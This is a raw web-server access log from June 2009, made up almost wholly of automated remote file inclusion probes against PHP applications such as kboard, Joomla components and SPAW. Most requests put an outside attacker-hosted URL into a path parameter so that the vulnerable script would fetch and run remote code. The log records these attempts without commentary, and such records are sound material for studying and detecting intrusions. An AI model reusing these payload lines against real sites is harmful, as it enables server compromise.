86.109.166.161 - - [28/Jun/2009:07:52:23 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 299
86.109.166.161 - - [28/Jun/2009:07:52:23 -0400] "GET /log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 303
86.109.166.161 - - [28/Jun/2009:07:52:26 -0400] "GET /log/sdaglobal.org-access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 328
218.234.21.178 - - [28/Jun/2009:07:53:10 -0400] "GET /log/sdaglobal.org-error_log.4//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
86.109.166.161 - - [28/Jun/2009:08:00:06 -0400] "GET /log/sdaglobal.org-access_log%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 329
86.109.166.161 - - [28/Jun/2009:08:00:07 -0400] "GET /log/sdaglobal.org-access_log%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 329
66.249.68.226 - - [28/Jun/2009:08:06:39 -0400] "GET /log/fable.hitechemall.com-error_log.1 HTTP/1.1" 200 18849
70.86.9.234 - - [28/Jun/2009:08:06:57 -0400] "GET /log//admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 319
70.86.9.234 - - [28/Jun/2009:08:06:58 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 315
63.223.85.28 - - [28/Jun/2009:08:13:58 -0400] "GET /log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 311
63.223.85.28 - - [28/Jun/2009:08:13:58 -0400] "GET /log/sdaglobal.org-access_log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 338
63.223.85.28 - - [28/Jun/2009:08:13:58 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 307
58.227.193.198 - - [28/Jun/2009:08:20:08 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 307
58.227.193.198 - - [28/Jun/2009:08:20:08 -0400] "GET /log/sdaglobal.org-access_log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 338
58.227.193.198 - - [28/Jun/2009:08:20:08 -0400] "GET /log//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 311
58.227.193.198 - - [28/Jun/2009:08:21:24 -0400] "GET /log/sdaglobal.org-error_log.1%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 339
63.223.85.28 - - [28/Jun/2009:08:22:20 -0400] "GET /log/sdaglobal.org-access_log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 336
66.249.68.226 - - [28/Jun/2009:08:22:18 -0400] "GET /log/shop.hitechemall.com-access_log.1 HTTP/1.1" 200 359023
87.16.83.24 - - [28/Jun/2009:08:23:39 -0400] "GET /log/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 58349
87.16.83.24 - - [28/Jun/2009:08:23:40 -0400] "GET /?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 200 9432
87.16.83.24 - - [28/Jun/2009:08:23:40 -0400] "GET /log/sdaglobal.org-access_log%20%20/?sourcedir=http://87.117.231.182/fx29id.txt??? HTTP/1.1" 404 312
58.227.193.198 - - [28/Jun/2009:08:27:59 -0400] "GET /log/sdaglobal.org-access_log//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 336
58.227.193.198 - - [28/Jun/2009:08:28:19 -0400] "GET /log/sdaglobal.org-error_log.2//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 337
58.227.193.198 - - [28/Jun/2009:08:32:42 -0400] "GET /log/sdaglobal.org-error_log.1//admin/classes/TplLoad.php?full_path_to_public_program=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 337
217.147.29.190 - - [28/Jun/2009:08:36:31 -0400] "GET /log/sdaglobal.org-access_log%20%20//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 337
217.147.29.190 - - [28/Jun/2009:08:36:31 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 306
217.147.29.190 - - [28/Jun/2009:08:36:35 -0400] "GET /log//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 310
151.1.219.156 - - [28/Jun/2009:08:40:02 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 9432
151.1.219.156 - - [28/Jun/2009:08:40:02 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 310
151.1.219.156 - - [28/Jun/2009:08:40:02 -0400] "GET /log/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 58349
217.147.29.190 - - [28/Jun/2009:08:44:46 -0400] "GET /log/sdaglobal.org-access_log//agendax/addevent.inc.php?agendax_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 335
217.147.29.190 - - [28/Jun/2009:08:51:17 -0400] "GET /log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 330
194.30.168.194 - - [28/Jun/2009:08:51:20 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 335
194.30.168.194 - - [28/Jun/2009:08:51:20 -0400] "GET /log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 339
217.147.29.190 - - [28/Jun/2009:08:51:24 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 359
38.117.93.134 - - [28/Jun/2009:08:54:12 -0400] "GET /log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 339
38.117.93.134 - - [28/Jun/2009:08:54:12 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 335
38.117.93.134 - - [28/Jun/2009:08:54:12 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 364
38.103.48.109 - - [28/Jun/2009:08:55:35 -0400] "GET /log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 339
38.103.48.109 - - [28/Jun/2009:08:55:35 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 335
38.103.48.109 - - [28/Jun/2009:08:55:35 -0400] "GET /log/sdaglobal.org-access_log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 364
217.147.29.190 - - [28/Jun/2009:08:55:54 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 325
217.147.29.190 - - [28/Jun/2009:08:55:54 -0400] "GET /log/sdaglobal.org-access_log//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 354
217.147.29.190 - - [28/Jun/2009:08:55:54 -0400] "GET /log//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 329
217.147.29.190 - - [28/Jun/2009:08:59:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 356
89.223.3.98 - - [28/Jun/2009:09:00:30 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 291
89.223.3.98 - - [28/Jun/2009:09:00:30 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320
89.223.3.98 - - [28/Jun/2009:09:00:30 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 295
89.223.3.98 - - [28/Jun/2009:09:00:51 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 291
89.223.3.98 - - [28/Jun/2009:09:00:51 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 295
89.223.3.98 - - [28/Jun/2009:09:00:51 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320
193.243.139.4 - - [28/Jun/2009:09:01:02 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 291
193.243.139.4 - - [28/Jun/2009:09:01:02 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 295
193.243.139.4 - - [28/Jun/2009:09:01:02 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320
193.243.139.4 - - [28/Jun/2009:09:02:11 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 295
193.243.139.4 - - [28/Jun/2009:09:02:11 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320
193.243.139.4 - - [28/Jun/2009:09:02:11 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 291
83.13.191.186 - - [28/Jun/2009:09:02:18 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320
83.13.191.186 - - [28/Jun/2009:09:02:18 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 295
83.13.191.186 - - [28/Jun/2009:09:02:21 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 291
83.13.191.186 - - [28/Jun/2009:09:02:27 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 320
83.13.191.186 - - [28/Jun/2009:09:02:27 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 291
83.13.191.186 - - [28/Jun/2009:09:02:27 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 295
216.17.99.13 - - [28/Jun/2009:09:02:49 -0400] "GET /log/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 295
216.17.99.13 - - [28/Jun/2009:09:02:49 -0400] "GET /errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 291
216.17.99.13 - - [28/Jun/2009:09:02:49 -0400] "GET /log/sdaglobal.org-error_log.2%20/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 322
216.17.99.13 - - [28/Jun/2009:09:03:52 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 320
193.243.139.4 - - [28/Jun/2009:09:03:54 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 320
193.243.139.4 - - [28/Jun/2009:09:03:54 -0400] "GET /errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 291
193.243.139.4 - - [28/Jun/2009:09:03:54 -0400] "GET /log/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 295
83.13.191.186 - - [28/Jun/2009:09:04:31 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 322
83.13.191.186 - - [28/Jun/2009:09:04:39 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 322
89.223.3.98 - - [28/Jun/2009:09:04:45 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 322
193.243.139.4 - - [28/Jun/2009:09:05:06 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 322
213.17.151.30 - - [28/Jun/2009:09:05:18 -0400] "GET /log/sdaglobal.org-error_log.2/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 365
213.17.151.30 - - [28/Jun/2009:09:05:18 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 335
213.17.151.30 - - [28/Jun/2009:09:05:19 -0400] "GET /log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 339
89.223.3.98 - - [28/Jun/2009:09:07:16 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 322
216.17.99.13 - - [28/Jun/2009:09:08:51 -0400] "GET /log/sdaglobal.org-error_log.1/errors.php?error=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 321
193.34.167.192 - - [28/Jun/2009:09:09:45 -0400] "GET /log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 339
193.34.167.192 - - [28/Jun/2009:09:09:45 -0400] "GET /log/sdaglobal.org-error_log.2/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 365
193.34.167.192 - - [28/Jun/2009:09:09:45 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 335
193.34.167.192 - - [28/Jun/2009:09:13:09 -0400] "GET /log/sdaglobal.org-error_log.1/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://maxhost.org/scripts/v7id.txt????? HTTP/1.1" 404 365
216.246.98.115 - - [28/Jun/2009:09:14:05 -0400] "GET /log/sdaglobal.org-access_log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 339
216.246.98.115 - - [28/Jun/2009:09:14:05 -0400] "GET /log/sdaglobal.org-access_log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 339
216.246.98.115 - - [28/Jun/2009:09:14:05 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 310
216.246.98.115 - - [28/Jun/2009:09:14:05 -0400] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 310
216.246.98.115 - - [28/Jun/2009:09:14:06 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 314
216.246.98.115 - - [28/Jun/2009:09:14:06 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 314
216.17.99.13 - - [28/Jun/2009:09:15:49 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 339
216.17.99.13 - - [28/Jun/2009:09:15:49 -0400] "GET /log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 343
193.243.139.4 - - [28/Jun/2009:09:16:26 -0400] "GET /log/sdaglobal.org-error_log.1/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 321
216.17.99.13 - - [28/Jun/2009:09:16:27 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 339
216.17.99.13 - - [28/Jun/2009:09:16:27 -0400] "GET /log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.maerkischepolster.de//images/lib/idfx1.txt??? HTTP/1.1" 404 343
213.17.151.30 - - [28/Jun/2009:09:18:39 -0400] "GET /log/sdaglobal.org-error_log.1/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.x-pronet.com/board/safe1.txt? HTTP/1.0" 404 365
193.243.139.4 - - [28/Jun/2009:09:19:13 -0400] "GET /log/sdaglobal.org-error_log.1/errors.php?error=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 321
217.147.29.190 - - [28/Jun/2009:09:20:30 -0400] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 312
217.147.29.190 - - [28/Jun/2009:09:20:30 -0400] "GET /log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 316
217.147.29.190 - - [28/Jun/2009:09:20:30 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 345
61.57.54.26 - - [28/Jun/2009:09:22:23 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
61.62.187.4 - - [28/Jun/2009:09:32:41 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
218.232.105.116 - - [28/Jun/2009:09:35:43 -0400] "GET /log/sdaglobal.org-error_log.2//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 337
218.232.105.116 - - [28/Jun/2009:09:35:43 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 311
218.232.105.116 - - [28/Jun/2009:09:35:43 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 307
218.232.105.116 - - [28/Jun/2009:09:35:54 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 311
218.232.105.116 - - [28/Jun/2009:09:35:54 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 307
218.232.105.116 - - [28/Jun/2009:09:35:54 -0400] "GET /log/sdaglobal.org-error_log.2//include/admin.lib.inc.php?site_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 337
71.234.36.8 - - [28/Jun/2009:09:36:31 -0400] "GET /favicon.ico HTTP/1.1" 404 292
217.147.29.190 - - [28/Jun/2009:09:36:50 -0400] "GET /log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 342
217.147.29.190 - - [28/Jun/2009:09:36:51 -0400] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 338
217.147.29.190 - - [28/Jun/2009:09:36:52 -0400] "GET /log/sdaglobal.org-access_log%20%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 369
217.64.195.220 - - [28/Jun/2009:09:44:57 -0400] "GET /log//components/com_forum/download.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319
217.64.195.220 - - [28/Jun/2009:09:44:57 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 315
217.64.195.220 - - [28/Jun/2009:09:45:43 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 315
217.64.195.220 - - [28/Jun/2009:09:45:43 -0400] "GET /log//components/com_forum/download.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 319
217.147.29.190 - - [28/Jun/2009:09:47:48 -0400] "GET /log/sdaglobal.org-access_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 367
208.115.111.248 - - [28/Jun/2009:09:49:14 -0400] "GET /?A9=On HTTP/1.1" 200 9432
59.24.49.35 - - [28/Jun/2009:09:52:41 -0400] "GET /log/sdaglobal.org-access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 323
59.24.49.35 - - [28/Jun/2009:09:52:43 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 292
59.24.49.35 - - [28/Jun/2009:09:52:43 -0400] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 296
59.24.49.35 - - [28/Jun/2009:09:52:44 -0400] "GET /log/sdaglobal.org-access_log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 323
59.24.49.35 - - [28/Jun/2009:09:52:46 -0400] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 296
59.24.49.35 - - [28/Jun/2009:09:52:47 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 292
217.64.195.220 - - [28/Jun/2009:09:52:51 -0400] "GET /log/sdaglobal.org-access_log//components/com_forum/download.php?phpbb_root_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 344
59.24.49.35 - - [28/Jun/2009:09:54:16 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 325
59.24.49.35 - - [28/Jun/2009:09:54:41 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 325
83.98.209.71 - - [28/Jun/2009:09:56:21 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 295
83.98.209.71 - - [28/Jun/2009:09:56:23 -0400] "GET /log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 299
66.249.68.226 - - [28/Jun/2009:09:56:48 -0400] "GET /log/class.hitechemall.com-access_log.1 HTTP/1.1" 200 223851
195.244.235.254 - - [28/Jun/2009:09:57:24 -0400] "GET /errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 291
195.244.235.254 - - [28/Jun/2009:09:57:24 -0400] "GET /log/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 295
195.244.235.254 - - [28/Jun/2009:09:57:24 -0400] "GET /log/sdaglobal.org-access_log%20%20/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 322
59.24.49.35 - - [28/Jun/2009:09:57:47 -0400] "GET /log/sdaglobal.org-access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 321
59.24.49.35 - - [28/Jun/2009:09:58:49 -0400] "GET /log/sdaglobal.org-access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 321
195.244.235.254 - - [28/Jun/2009:10:05:11 -0400] "GET /log/sdaglobal.org-access_log/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 320
60.251.217.4 - - [28/Jun/2009:10:11:31 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 292
60.251.217.4 - - [28/Jun/2009:10:11:32 -0400] "GET /log/sdaglobal.org-access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321
61.6.149.66 - - [28/Jun/2009:10:12:19 -0400] "GET / HTTP/1.1" 304 -
60.251.217.4 - - [28/Jun/2009:10:13:52 -0400] "GET /log/sdaglobal.org-access_log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 321
74.203.196.99 - - [28/Jun/2009:10:18:06 -0400] "GET /log/sdaglobal.org-access_log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 357
74.203.196.99 - - [28/Jun/2009:10:18:06 -0400] "GET /log/sdaglobal.org-access_log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 357
74.203.196.99 - - [28/Jun/2009:10:18:10 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 328
74.203.196.99 - - [28/Jun/2009:10:18:10 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 328
74.203.196.99 - - [28/Jun/2009:10:18:13 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 332
74.203.196.99 - - [28/Jun/2009:10:18:13 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 332
60.251.217.4 - - [28/Jun/2009:10:18:49 -0400] "GET /log/sdaglobal.org-access_log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 323
60.251.217.4 - - [28/Jun/2009:10:18:54 -0400] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5/kboard.php?board=free&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 292
72.30.142.107 - - [28/Jun/2009:10:26:18 -0400] "GET /log/gardeninheaven.sdaglobal.org-error_log HTTP/1.0" 200 106
203.218.228.11 - - [28/Jun/2009:10:27:14 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
147.27.14.5 - - [28/Jun/2009:10:28:21 -0400] "GET / HTTP/1.1" 200 9432
